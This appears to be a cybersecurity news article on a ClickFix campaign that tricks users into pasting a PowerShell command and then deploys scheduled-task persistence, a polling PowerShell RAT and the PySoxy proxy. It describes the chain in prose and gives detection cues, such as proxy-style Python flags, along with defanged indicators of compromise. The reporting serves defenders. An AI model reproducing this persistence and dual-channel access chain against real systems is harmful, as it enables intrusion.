ClickFix Evolves with 10-Year-Old Open-Source Python SOCKS5 Proxy

HomeCyber Security News ClickFix Evolves with 10-Year-Old Open-Source Python SOCKS5 Proxy By Tushar Subhra Dutta May 13, 2026 A cyberattack campaign that tricks users into running malicious commands on their own computers has taken a dangerous new turn. The technique, known as “ClickFix,” has been circulating for some time, but a recent incident revealed that attackers are now pairing it with a 10-year-old open-source Python tool to create a far more resilient form of access. What was once treated as a simple user mistake is now evolving into a complex multi-layered intrusion that can survive even after security tools step in to block it. The attack begins when a user visits a compromised website that presents a fake prompt, convincing the visitor to paste and run a PowerShell command on their own machine. This well-known social engineering trick has been used in many previous campaigns before. What makes this version different is what happens after that single command runs. Rather than stopping at one callback, the intrusion sets up automated access that continues long after the initial click. Security researchers at ReliaQuest identified this updated campaign in April 2026, noting that it marked the first observed case where ClickFix execution was combined with PySoxy, a Python-based SOCKS5 proxy tool originally published roughly a decade ago. The analysts described the result as a “durable access chain,” one that continued re-executing even after outbound connections were blocked by security controls. That detail alone signals a meaningful shift in how this threat behaves. ClickFix Deploys PySoxy The central lesson here is one that defenders often overlook: blocking an attacker’s connection does not mean the attack is over. In the incident studied, both of the attacker’s access channels were cut off by endpoint controls, yet a scheduled task already on the affected machine kept attempting to relaunch the malicious script for hours. This persistence mechanism transformed a single user mistake into an ongoing compromise. Ransomware affiliates may eventually begin treating ClickFix as a primary entry point alongside other established access methods. The operational similarities between this chain and SocGholish intrusions, which also rely on social engineering before moving into reconnaissance and proxy-based access, suggest ClickFix is maturing into a serious pre-ransomware delivery platform. Once the initial PowerShell command ran, the attacker moved quickly to build a deeper foothold. A scheduled task was planted that relaunched a staged script from the C:\ProgramData folder roughly every 40 minutes. That script functioned as a lightweight remote access tool, polling the attacker’s server every three seconds, executing commands on the host, and sending back results. After establishing this PowerShell-based access, the attacker moved into reconnaissance. Built-in Windows tools were used to enumerate group memberships, identify domain controllers, and map other machines on the network. Only after confirming that a staging server could be reached did the attacker introduce PySoxy, downloading compiled Python bytecode and running it with proxy arguments pointing to a separate external IP address. PySoxy gave the attacker a second, independent route back into the host. This second channel used different infrastructure and a different traffic pattern than the first, meaning that a complete shutdown of the PowerShell C2 connection would still leave this second door open. The attacker had built two separate access paths into the same environment. Why a Blocked Callback Is Not Enough The most important takeaway from this campaign is that containment requires more than blocking a single connection. Analysts recommend fully isolating the affected host and reviewing all scheduled tasks, particularly those created shortly after suspicious PowerShell activity. Any tasks pointing to scripts in non-standard directories like ProgramData should be treated as high-priority findings. Incident responders should look for Python execution tied to proxy-style command-line arguments, specifically flags like -ssl, -remote_ip, and -remote_port, as well as compiled .pyc files in unexpected locations. Removing staged scripts, Python runtimes, and bytecode files is just as critical as blocking the network connection, because any leftover component can restart the chain. Treating a ClickFix incident as a potential full compromise rather than an isolated user error is now the only appropriate response. Indicators of Compromise (IoCs):- Type Indicator Description IP Address 185.205.211[.]217 ClickFix Infrastructure IP  IP Address 206.206.103[.]120 PowerShell RAT C2  IP Address 206.206.103[.]106 Staging and Exfiltration IP  IP Address 167.99.158[.]97 PySoxy Proxy Destination IP  Domain strapness[.]com ClickFix Stager Domain  Domain abledom[.]net Secondary C2 Domain  Domain overlateise[.]com Hosted the ClickFix script (/api/jquery[.]js) injected into the compromised site  Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Trending News DarkMoon AI-Powered Autonomous Penetration Testing Platform With 50+ Tools Critical Microsoft 365 Copilot Vulnerabilities Expose sensitive Information Critical Spring Vulnerabilities Expose Arbitrary Files and GCP Secrets OpenAI Daybreak Automates Vulnerability Detection and Fixing Škoda Security Incident Exposes Customers Data From Online Shop Latest News Cyber Security News iOS 26.5 Brings End-to-end Encrypted RCS Messaging Between iPhone and Android Cyber Security News New Exim BDAT GnuTLS Vulnerability Enables Code Execution Attacks Cyber Security News Google Enhances Android Mobile Security with New AI-Powered Protections Cyber Security News Microsoft Releases Cumulative Update for Windows 11, Version 25H2 and 24H2 Cyber Security News Top 10 Best Data Loss Prevention Software in 2026